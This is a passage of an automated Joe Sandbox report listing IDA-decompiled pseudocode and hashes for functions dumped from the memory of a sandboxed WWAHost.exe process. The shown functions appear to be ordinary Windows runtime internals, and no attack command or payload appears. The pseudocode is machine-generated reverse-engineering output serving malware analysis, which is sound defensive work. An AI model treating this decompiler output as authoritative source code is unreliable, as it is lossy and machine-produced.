                                              • Opcode Fuzzy Hash: 560fab7eabfff61a9d6b1078af1cf6b71e4be5e4b825d4507055d9c818308c63
                                              • Instruction Fuzzy Hash: 5651E135205342AFD721EF68C940B6BB7E8FF80750F14491EF8A68B652E775E844C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03982AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                              				signed short* _v8;
                                              				signed short* _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr* _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				short _t56;
                                              				signed int _t57;
                                              				intOrPtr _t58;
                                              				signed short* _t61;
                                              				intOrPtr _t72;
                                              				intOrPtr _t75;
                                              				intOrPtr _t84;
                                              				intOrPtr _t87;
                                              				intOrPtr* _t90;
                                              				signed short* _t91;
                                              				signed int _t95;
                                              				signed short* _t96;
                                              				intOrPtr _t97;
                                              				intOrPtr _t102;
                                              				signed int _t108;
                                              				intOrPtr _t110;
                                              				signed int _t111;
                                              				signed short* _t112;
                                              				void* _t113;
                                              				signed int _t116;
                                              				signed short** _t119;
                                              				short* _t120;
                                              				signed int _t123;
                                              				signed int _t124;
                                              				void* _t125;
                                              				intOrPtr _t127;
                                              				signed int _t128;
                                              
                                              				_t90 = __ecx;
                                              				_v16 = __edx;
                                              				_t108 = _a4;
                                              				_v28 = __ecx;
                                              				_t4 = _t108 - 1; // -1
                                              				if(_t4 > 0x13) {
                                              					L15:
                                              					_t56 = 0xc0000100;
                                              					L16:
                                              					return _t56;
                                              				}
                                              				_t57 = _t108 * 0x1c;
                                              				_v32 = _t57;
                                              				_t6 = _t57 + 0x3a48204; // 0x0
                                              				_t123 =  *_t6;
                                              				_t7 = _t57 + 0x3a48208; // 0x3a48207
                                              				_t8 = _t57 + 0x3a48208; // 0x3a48207
                                              				_t119 = _t8;
                                              				_v36 = _t123;
                                              				_t110 = _t7 + _t123 * 8;
                                              				_v24 = _t110;
                                              				_t111 = _a4;
                                              				if(_t119 >= _t110) {
                                              					L12:
                                              					if(_t123 != 3) {
                                              						_t58 =  *0x3a48450; // 0xb5173a
                                              						if(_t58 == 0) {
                                              							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                              						}
                                              					} else {
                                              						_t26 = _t57 + 0x3a4821c; // 0x0
                                              						_t58 =  *_t26;
                                              					}
                                              					 *_t90 = _t58;
                                              					goto L15;
                                              				} else {
                                              					goto L2;
                                              				}
                                              				while(1) {
                                              					_t116 =  *_t61 & 0x0000ffff;
                                              					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                              					if(_t116 == _t128) {
                                              						goto L18;
                                              					}
                                              					L5:
                                              					if(_t116 >= 0x61) {
                                              						if(_t116 > 0x7a) {
                                              							_t97 =  *0x3a46d5c; // 0x7f7c0654
                                              							_t72 =  *0x3a46d5c; // 0x7f7c0654
                                              							_t75 =  *0x3a46d5c; // 0x7f7c0654
                                              							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                              						} else {
                                              							_t116 = _t116 - 0x20;
                                              						}
                                              					}
                                              					if(_t128 >= 0x61) {
                                              						if(_t128 > 0x7a) {
                                              							_t102 =  *0x3a46d5c; // 0x7f7c0654
                                              							_t84 =  *0x3a46d5c; // 0x7f7c0654
                                              							_t87 =  *0x3a46d5c; // 0x7f7c0654
                                              							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                              						} else {
                                              							_t128 = _t128 - 0x20;
                                              						}
                                              					}
                                              					if(_t116 == _t128) {
                                              						_t61 = _v12;
                                              						_t96 = _v8;
                                              					} else {
                                              						_t113 = _t116 - _t128;
                                              						L9:
                                              						_t111 = _a4;
                                              						if(_t113 == 0) {
                                              							_t115 =  &(( *_t119)[_t111 + 1]);
                                              							_t33 =  &(_t119[1]); // 0x100
                                              							_t120 = _a8;
                                              							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                              							_t35 = _t95 - 1; // 0xff
                                              							_t124 = _t35;
                                              							if(_t120 == 0) {
                                              								L27:
                                              								 *_a16 = _t95;
                                              								_t56 = 0xc0000023;
                                              								goto L16;
                                              							}
                                              							if(_t124 >= _a12) {
                                              								if(_a12 >= 1) {
                                              									 *_t120 = 0;
                                              								}
                                              								goto L27;
                                              							}
                                              							 *_a16 = _t124;
                                              							_t125 = _t124 + _t124;
                                              							E0399F3E0(_t120, _t115, _t125);
                                              							_t56 = 0;
                                              							 *((short*)(_t125 + _t120)) = 0;
                                              							goto L16;
                                              						}
                                              						_t119 =  &(_t119[2]);
                                              						if(_t119 < _v24) {
                                              							L2:
                                              							_t91 =  *_t119;
                                              							_t61 = _t91;
                                              							_v12 = _t61;
                                              							_t112 =  &(_t61[_t111]);
                                              							_v8 = _t112;
                                              							if(_t61 >= _t112) {
                                              								break;
                                              							} else {
                                              								_t127 = _v16 - _t91;
                                              								_t96 = _t112;
                                              								_v20 = _t127;
                                              								_t116 =  *_t61 & 0x0000ffff;
                                              								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                              								if(_t116 == _t128) {
                                              									goto L18;
                                              								}
                                              								goto L5;
                                              							}
                                              						} else {
                                              							_t90 = _v28;
                                              							_t57 = _v32;
                                              							_t123 = _v36;
                                              							goto L12;
                                              						}
                                              					}
                                              					L18:
                                              					_t61 =  &(_t61[1]);
                                              					_v12 = _t61;
                                              					if(_t61 >= _t96) {
                                              						break;
                                              					}
                                              					_t127 = _v20;
                                              				}
                                              				_t113 = 0;
                                              				goto L9;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8e10ffd1aa208f909a9643efdbf25138ef7440936909f3a9d48755ce5f611e9
                                              • Instruction ID: 2dabd3cf645eaf090cb1bd1e2d36e4a3b9dc67c1b55fefe8deb031cde6d9f37f
                                              • Opcode Fuzzy Hash: a8e10ffd1aa208f909a9643efdbf25138ef7440936909f3a9d48755ce5f611e9
                                              • Instruction Fuzzy Hash: D751D3B6E011168FCB18EF1CC4909BDB7F5FBC9700715895AE896EB324E735AA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E03A1AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed short* _t36;
                                              				signed int _t41;
                                              				char* _t42;
                                              				intOrPtr _t43;
                                              				signed int _t47;
                                              				void* _t52;
                                              				signed int _t57;
                                              				intOrPtr _t61;
                                              				signed char _t62;
                                              				signed int _t72;
                                              				signed char _t85;
                                              				signed int _t88;
                                              
                                              				_t73 = __edx;
                                              				_push(__ecx);
                                              				_t85 = __ecx;
                                              				_v8 = __edx;
                                              				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                              				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                              				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                              					_t57 = _t57 | 0x00000001;
                                              				}
                                              				_t88 = 0;
                                              				_t36 = 0;
                                              				_t96 = _a12;
                                              				if(_a12 == 0) {
                                              					_t62 = _a8;
                                              					__eflags = _t62;
                                              					if(__eflags == 0) {
                                              						goto L12;
                                              					}
                                              					_t52 = E03A1C38B(_t85, _t73, _t57, 0);
                                              					_t62 = _a8;
                                              					 *_t62 = _t52;
                                              					_t36 = 0;
                                              					goto L11;
                                              				} else {
                                              					_t36 = E03A1ACFD(_t85, _t73, _t96, _t57, _a8);
                                              					if(0 == 0 || 0 == 0xffffffff) {
                                              						_t72 = _t88;
                                              					} else {
                                              						_t72 =  *0x00000000 & 0x0000ffff;
                                              					}
                                              					 *_a12 = _t72;
                                              					_t62 = _a8;
                                              					L11:
                                              					_t73 = _v8;
                                              					L12:
                                              					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                              						L19:
                                              						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                              							L22:
                                              							_t74 = _v8;
                                              							__eflags = _v8;
                                              							if(__eflags != 0) {
                                              								L25:
                                              								__eflags = _t88 - 2;
                                              								if(_t88 != 2) {
                                              									__eflags = _t85 + 0x44 + (_t88 << 6);
                                              									_t88 = E03A1FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                              									goto L34;
                                              								}
                                              								L26:
                                              								_t59 = _v8;
                                              								E03A1EA55(_t85, _v8, _t57);
                                              								asm("sbb esi, esi");
                                              								_t88 =  ~_t88;
                                              								_t41 = E03977D50();
                                              								__eflags = _t41;
                                              								if(_t41 == 0) {
                                              									_t42 = 0x7ffe0380;
                                              								} else {
                                              									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              								}
                                              								__eflags =  *_t42;
                                              								if( *_t42 != 0) {
                                              									_t43 =  *[fs:0x30];
                                              									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                              									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                              										__eflags = _t88;
                                              										if(_t88 != 0) {
                                              											E03A11608(_t85, _t59, 3);
                                              										}
                                              									}
                                              								}
                                              								goto L34;
                                              							}
                                              							_push(_t62);
                                              							_t47 = E03A21536(0x3a48ae4, (_t74 -  *0x3a48b04 >> 0x14) + (_t74 -  *0x3a48b04 >> 0x14), _t88, __eflags);
                                              							__eflags = _t47;
                                              							if(_t47 == 0) {
                                              								goto L26;
                                              							}
                                              							_t74 = _v12;
                                              							_t27 = _t47 - 1; // -1
                                              							_t88 = _t27;
                                              							goto L25;
                                              						}
                                              						_t62 = _t85;
                                              						if(L03A1C323(_t62, _v8, _t57) != 0xffffffff) {
                                              							goto L22;
                                              						}
                                              						_push(_t62);
                                              						_push(_t88);
                                              						E03A1A80D(_t85, 9, _v8, _t88);
                                              						goto L34;
                                              					} else {
                                              						_t101 = _t36;
                                              						if(_t36 != 0) {
                                              							L16:
                                              							if(_t36 == 0xffffffff) {
                                              								goto L19;
                                              							}
                                              							_t62 =  *((intOrPtr*)(_t36 + 2));
                                              							if((_t62 & 0x0000000f) == 0) {
                                              								goto L19;
                                              							}
                                              							_t62 = _t62 & 0xf;
                                              							if(E039FCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                              								L34:
                                              								return _t88;
                                              							}
                                              							goto L19;
                                              						}
                                              						_t62 = _t85;
                                              						_t36 = E03A1ACFD(_t62, _t73, _t101, _t57, _t62);
                                              						if(_t36 == 0) {
                                              							goto L19;
                                              						}
                                              						goto L16;
                                              					}
                                              				}
                                              			}


                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a33c23bae084cde2b5db8d0c8ae34bc8845bcf875825c327963d38046af834c
                                              • Instruction ID: 0bafb9afd0e1ae08a22b47e248d7cd91b7fa8872afa327d3fef0fa1fbea03508
                                              • Opcode Fuzzy Hash: 3a33c23bae084cde2b5db8d0c8ae34bc8845bcf875825c327963d38046af834c
                                              • Instruction Fuzzy Hash: E041C3B57023119BC726DB29C994B3BF79AEF84620F08821EF8568B3D0DB34D821C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E0397DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				char _v5;
                                              				signed int _v12;
                                              				signed int* _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed int _t54;
                                              				char* _t58;
                                              				signed int _t66;
                                              				intOrPtr _t67;
                                              				intOrPtr _t68;
                                              				intOrPtr _t72;
                                              				intOrPtr _t73;
                                              				signed int* _t75;
                                              				intOrPtr _t79;
                                              				intOrPtr _t80;
                                              				char _t82;
                                              				signed int _t83;
                                              				signed int _t84;
                                              				signed int _t88;
                                              				signed int _t89;
                                              				intOrPtr _t90;
                                              				intOrPtr _t92;
                                              				signed int _t97;
                                              				intOrPtr _t98;
                                              				intOrPtr* _t99;
                                              				signed int* _t101;
                                              				signed int* _t102;
                                              				intOrPtr* _t103;
                                              				intOrPtr _t105;
                                              				signed int _t106;
                                              				void* _t118;
                                              
                                              				_t92 = __edx;
                                              				_t75 = _a4;
                                              				_t98 = __ecx;
                                              				_v44 = __edx;
                                              				_t106 = _t75[1];
                                              				_v40 = __ecx;
                                              				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                              					_t82 = 0;
                                              				} else {
                                              					_t82 = 1;
                                              				}
                                              				_v5 = _t82;
                                              				_t6 = _t98 + 0xc8; // 0xc9
                                              				_t101 = _t6;
                                              				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                              				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                              				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                              				if(_t82 != 0) {
                                              					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                              					_t83 =  *_t75;
                                              					_t54 = _t75[1];
                                              					 *_t101 = _t83;
                                              					_t84 = _t83 | _t54;
                                              					_t101[1] = _t54;
                                              					if(_t84 == 0) {
                                              						_t101[1] = _t101[1] & _t84;
                                              						 *_t101 = 1;
                                              					}
                                              					goto L19;
                                              				} else {
                                              					if(_t101 == 0) {
                                              						E0395CC50(E03954510(0xc000000d));
                                              						_t88 =  *_t101;
                                              						_t97 = _t101[1];
                                              						L15:
                                              						_v12 = _t88;
                                              						_t66 = _t88 -  *_t75;
                                              						_t89 = _t97;
                                              						asm("sbb ecx, [ebx+0x4]");
                                              						_t118 = _t89 - _t97;
                                              						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                              							_t66 = _t66 | 0xffffffff;
                                              							_t89 = 0x7fffffff;
                                              						}
                                              						 *_t101 = _t66;
                                              						_t101[1] = _t89;
                                              						L19:
                                              						if(E03977D50() != 0) {
                                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              						} else {
                                              							_t58 = 0x7ffe0386;
                                              						}
                                              						_t102 = _v16;
                                              						if( *_t58 != 0) {
                                              							_t58 = E03A28ED6(_t102, _t98);
                                              						}
                                              						_t76 = _v44;
                                              						E03972280(_t58, _v44);
                                              						E0397DD82(_v44, _t102, _t98);
                                              						E0397B944(_t102, _v5);
                                              						return E0396FFB0(_t76, _t98, _t76);
                                              					}
                                              					_t99 = 0x7ffe03b0;
                                              					do {
                                              						_t103 = 0x7ffe0010;
                                              						do {
                                              							_t67 =  *0x3a48628; // 0x0
                                              							_v28 = _t67;
                                              							_t68 =  *0x3a4862c; // 0x0
                                              							_v32 = _t68;
                                              							_v24 =  *((intOrPtr*)(_t99 + 4));
                                              							_v20 =  *_t99;
                                              							while(1) {
                                              								_t97 =  *0x7ffe000c;
                                              								_t90 =  *0x7FFE0008;
                                              								if(_t97 ==  *_t103) {
                                              									goto L10;
                                              								}
                                              								asm("pause");
                                              							}
                                              							L10:
                                              							_t79 = _v24;
                                              							_t99 = 0x7ffe03b0;
                                              							_v12 =  *0x7ffe03b0;
                                              							_t72 =  *0x7FFE03B4;
                                              							_t103 = 0x7ffe0010;
                                              							_v36 = _t72;
                                              						} while (_v20 != _v12 || _t79 != _t72);
                                              						_t73 =  *0x3a48628; // 0x0
                                              						_t105 = _v28;
                                              						_t80 =  *0x3a4862c; // 0x0
                                              					} while (_t105 != _t73 || _v32 != _t80);
                                              					_t98 = _v40;
                                              					asm("sbb edx, [ebp-0x20]");
                                              					_t88 = _t90 - _v12 - _t105;
                                              					_t75 = _a4;
                                              					asm("sbb edx, eax");
                                              					_t31 = _t98 + 0xc8; // 0x3a1fb53
                                              					_t101 = _t31;
                                              					 *_t101 = _t88;
                                              					_t101[1] = _t97;
                                              					goto L15;
                                              				}
                                              			}

                                              0x00000000
                                              0x0397dce4

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7eb277eeaa97b381d4c22df053b72b2f2184a61260795fedba9b28c0b71262ee
                                              • Instruction ID: a0da6344946b65f9611227ad200e9b55e70a289cc46bd9d02196d7ef22c867a9
                                              • Opcode Fuzzy Hash: 7eb277eeaa97b381d4c22df053b72b2f2184a61260795fedba9b28c0b71262ee
                                              • Instruction Fuzzy Hash: AD51C375A00645CFCB14DFA8C480AAEFBF9FF88350F28859AD555AB384DB35AD44CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E0396EF40(intOrPtr __ecx) {
                                              				char _v5;
                                              				char _v6;
                                              				char _v7;
                                              				char _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr _t58;
                                              				char _t59;
                                              				signed char _t69;
                                              				void* _t73;
                                              				signed int _t74;
                                              				char _t79;
                                              				signed char _t81;
                                              				signed int _t85;
                                              				signed int _t87;
                                              				intOrPtr _t90;
                                              				signed char* _t91;
                                              				void* _t92;
                                              				signed int _t94;
                                              				void* _t96;
                                              
                                              				_t90 = __ecx;
                                              				_v16 = __ecx;
                                              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                              					_t58 =  *((intOrPtr*)(__ecx));
                                              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                              						E03959080(_t73, __ecx, __ecx, _t92);
                                              					}
                                              				}
                                              				_t74 = 0;
                                              				_t96 =  *0x7ffe036a - 1;
                                              				_v12 = 0;
                                              				_v7 = 0;
                                              				if(_t96 > 0) {
                                              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                              					_v12 = _t74;
                                              					_v7 = _t96 != 0;
                                              				}
                                              				_t79 = 0;
                                              				_v8 = 0;
                                              				_v5 = 0;
                                              				while(1) {
                                              					L4:
                                              					_t59 = 1;
                                              					L5:
                                              					while(1) {
                                              						if(_t59 == 0) {
                                              							L12:
                                              							_t21 = _t90 + 4; // 0x7746c21e
                                              							_t87 =  *_t21;
                                              							_v6 = 0;
                                              							if(_t79 != 0) {
                                              								if((_t87 & 0x00000002) != 0) {
                                              									goto L19;
                                              								}
                                              								if((_t87 & 0x00000001) != 0) {
                                              									_v6 = 1;
                                              									_t74 = _t87 ^ 0x00000003;
                                              								} else {
                                              									_t51 = _t87 - 2; // -2
                                              									_t74 = _t51;
                                              								}
                                              								goto L15;
                                              							} else {
                                              								if((_t87 & 0x00000001) != 0) {
                                              									_v6 = 1;
                                              									_t74 = _t87 ^ 0x00000001;
                                              								} else {
                                              									_t26 = _t87 - 4; // -4
                                              									_t74 = _t26;
                                              									if((_t74 & 0x00000002) == 0) {
                                              										_t74 = _t74 - 2;
                                              									}
                                              								}
                                              								L15:
                                              								if(_t74 == _t87) {
                                              									L19:
                                              									E03952D8A(_t74, _t90, _t87, _t90);
                                              									_t74 = _v12;
                                              									_v8 = 1;
                                              									if(_v7 != 0 && _t74 > 0x64) {
                                              										_t74 = _t74 - 1;
                                              										_v12 = _t74;
                                              									}
                                              									_t79 = _v5;
                                              									goto L4;
                                              								}
                                              								asm("lock cmpxchg [esi], ecx");
                                              								if(_t87 != _t87) {
                                              									_t74 = _v12;
                                              									_t59 = 0;
                                              									_t79 = _v5;
                                              									continue;
                                              								}
                                              								if(_v6 != 0) {
                                              									_t74 = _v12;
                                              									L25:
                                              									if(_v7 != 0) {
                                              										if(_t74 < 0x7d0) {
                                              											if(_v8 == 0) {
                                              												_t74 = _t74 + 1;
                                              											}
                                              										}
                                              										_t38 = _t90 + 0x14; // 0x0
                                              										_t39 = _t90 + 0x14; // 0x0
                                              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                              											_t85 = _t85 & 0xff000000;
                                              										}
                                              										 *(_t90 + 0x14) = _t85;
                                              									}
                                              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                              									 *((intOrPtr*)(_t90 + 8)) = 1;
                                              									return 0;
                                              								}
                                              								_v5 = 1;
                                              								_t87 = _t74;
                                              								goto L19;
                                              							}
                                              						}
                                              						_t94 = _t74;
                                              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                              						if(_t74 == 0) {
                                              							goto L12;
                                              						} else {
                                              							_t91 = _t90 + 4;
                                              							goto L8;
                                              							L9:
                                              							while((_t81 & 0x00000001) != 0) {
                                              								_t69 = _t81;
                                              								asm("lock cmpxchg [edi], edx");
                                              								if(_t69 != _t81) {
                                              									_t81 = _t69;
                                              									continue;
                                              								}
                                              								_t90 = _v16;
                                              								goto L25;
                                              							}
                                              							asm("pause");
                                              							_t94 = _t94 - 1;
                                              							if(_t94 != 0) {
                                              								L8:
                                              								_t81 =  *_t91;
                                              								goto L9;
                                              							} else {
                                              								_t90 = _v16;
                                              								_t79 = _v5;
                                              								goto L12;
                                              							}
                                              						}
                                              					}
                                              				}
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction ID: 099dcfe8e1ad661f5c794fa35b29355de84bf38b4e5a77dba24baa540c76e4ca
                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction Fuzzy Hash: F4512435E06749EFDB20CB68D2C07EEFBB9AF05384F1C81A8D44697281C376A989C741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E03A2740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                              				signed short* _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _t55;
                                              				void* _t56;
                                              				intOrPtr* _t66;
                                              				intOrPtr* _t69;
                                              				void* _t74;
                                              				intOrPtr* _t78;
                                              				intOrPtr* _t81;
                                              				intOrPtr* _t82;
                                              				intOrPtr _t83;
                                              				signed short* _t84;
                                              				intOrPtr _t85;
                                              				signed int _t87;
                                              				intOrPtr* _t90;
                                              				intOrPtr* _t93;
                                              				intOrPtr* _t94;
                                              				void* _t98;
                                              
                                              				_t84 = __edx;
                                              				_t80 = __ecx;
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t55 = __ecx;
                                              				_v8 = __edx;
                                              				_t87 =  *__edx & 0x0000ffff;
                                              				_v12 = __ecx;
                                              				_t3 = _t55 + 0x154; // 0x154
                                              				_t93 = _t3;
                                              				_t78 =  *_t93;
                                              				_t4 = _t87 + 2; // 0x2
                                              				_t56 = _t4;
                                              				while(_t78 != _t93) {
                                              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                              						L4:
                                              						_t78 =  *_t78;
                                              						continue;
                                              					} else {
                                              						_t7 = _t78 + 0x18; // 0x18
                                              						if(E039AD4F0(_t7, _t84[2], _t87) == _t87) {
                                              							_t40 = _t78 + 0xc; // 0xc
                                              							_t94 = _t40;
                                              							_t90 =  *_t94;
                                              							while(_t90 != _t94) {
                                              								_t41 = _t90 + 8; // 0x8
                                              								_t74 = E0399F380(_a4, _t41, 0x10);
                                              								_t98 = _t98 + 0xc;
                                              								if(_t74 != 0) {
                                              									_t90 =  *_t90;
                                              									continue;
                                              								}
                                              								goto L12;
                                              							}
                                              							_t82 = L03974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                              							if(_t82 != 0) {
                                              								_t46 = _t78 + 0xc; // 0xc
                                              								_t69 = _t46;
                                              								asm("movsd");
                                              								asm("movsd");
                                              								asm("movsd");
                                              								asm("movsd");
                                              								_t85 =  *_t69;
                                              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                              									L20:
                                              									_t82 = 3;
                                              									asm("int 0x29");
                                              								}
                                              								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                              								 *_t82 = _t85;
                                              								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                              								 *_t69 = _t82;
                                              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                              								goto L11;
                                              							} else {
                                              								L18:
                                              								_push(0xe);
                                              								_pop(0);
                                              							}
                                              						} else {
                                              							_t84 = _v8;
                                              							_t9 = _t87 + 2; // 0x2
                                              							_t56 = _t9;
                                              							goto L4;
                                              						}
                                              					}
                                              					L12:
                                              					return 0;
                                              				}
                                              				_t10 = _t87 + 0x1a; // 0x1a
                                              				_t78 = L03974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                              				if(_t78 == 0) {
                                              					goto L18;
                                              				} else {
                                              					_t12 = _t87 + 2; // 0x2
                                              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                              					_t16 = _t78 + 0x18; // 0x18
                                              					E0399F3E0(_t16, _v8[2], _t87);
                                              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                              					_t19 = _t78 + 0xc; // 0xc
                                              					_t66 = _t19;
                                              					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                              					 *_t66 = _t66;
                                              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                              					_t81 = L03974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                              					if(_t81 == 0) {
                                              						goto L18;
                                              					} else {
                                              						_t26 = _t78 + 0xc; // 0xc
                                              						_t69 = _t26;
                                              						asm("movsd");
                                              						asm("movsd");
                                              						asm("movsd");
                                              						asm("movsd");
                                              						_t85 =  *_t69;
                                              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                              							goto L20;
                                              						} else {
                                              							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                              							 *_t81 = _t85;
                                              							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                              							 *_t69 = _t81;
                                              							_t83 = _v12;
                                              							 *(_t78 + 8) = 1;
                                              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                              							_t34 = _t83 + 0x154; // 0x1ba
                                              							_t69 = _t34;
                                              							_t85 =  *_t69;
                                              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                              								goto L20;
                                              							} else {
                                              								 *_t78 = _t85;
                                              								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                              								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                              								 *_t69 = _t78;
                                              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                              							}
                                              						}
                                              						goto L11;
                                              					}
                                              				}
                                              				goto L12;
                                              			}






















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
